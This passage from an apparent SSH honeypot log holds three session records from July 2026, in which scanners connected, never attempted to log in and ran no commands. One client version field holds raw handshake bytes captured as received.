  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
104.152.52.100
2026-07-02 22:04:35.810182 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 00b0c62f125c
Client Version: SSH-2.0-Go
Engagement Duration: 0.1s
HASSH Fingerprint: e54ef3ec27fe1fea7ab64d3fa05359fd
{
  "id": "00b0c62f125c",
  "src_ip": "104.152.52.100",
  "start_time": "2026-07-02T22:04:35.810182Z",
  "end_time": "2026-07-02T22:04:35.937182Z",
  "duration": "0.1",
  "version": "SSH-2.0-Go",
  "hassh": "e54ef3ec27fe1fea7ab64d3fa05359fd",
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
104.152.52.103
2026-07-02 22:04:35.678626 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: dc8139b9d67e
Client Version: \xca\xc6K \ \xd2\xfba#\xc6X\xc4"\xdeCm\x953\xb5\xd8]/\xc0[\xa3\x9d\xd13\xc4 ^\xa8=@QP\xa7)\xd4\xe1[B \xa4\xe73\x98(7\xa2\x96ʙ\xe4o(e\xf8\xc0+\xc0/\xc0,\xc00̨̩\xc0 \xc0\xc0
Engagement Duration: 0.0s
{
  "id": "dc8139b9d67e",
  "src_ip": "104.152.52.103",
  "start_time": "2026-07-02T22:04:35.678626Z",
  "end_time": "2026-07-02T22:04:35.684397Z",
  "duration": "0.0",
  "version": "\u0016\u0003\u0001\u0005\\xca\u0001\u0000\u0005\\xc6\u0003\u0003K\t\\\t\\xd2\\xfba#\\xc6\u0005X\\xc4\"\\xdeCm\u001c\\x953\\xb5\\xd8]/\\xc0[\\xa3\u0006\\x9d\u0006\\xd13\\xc4 ^\\xa8=@QP\\xa7)\\xd4\\xe1[\u0000\u0015B\f\\xa4\\xe73\\x98\b(7\\xa2\\x96\u0013\u0299\\xe4o(e\\xf8\u0000\u001a\\xc0+\\xc0/\\xc0,\\xc00\u0329\u0328\\xc0\t\\xc0\u0013\\xc0",
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
192.168.0.1
2026-07-02 21:58:04.623520 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: f05ffb12a4d6
Client Version: Unknown
Engagement Duration: 0.0s
{
  "id": "f05ffb12a4d6",
  "src_ip": "192.168.0.1",
  "start_time": "2026-07-02T21:58:04.623520Z",
  "end_time": "2026-07-02T21:58:04.635449Z",
  "duration": "0.0",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}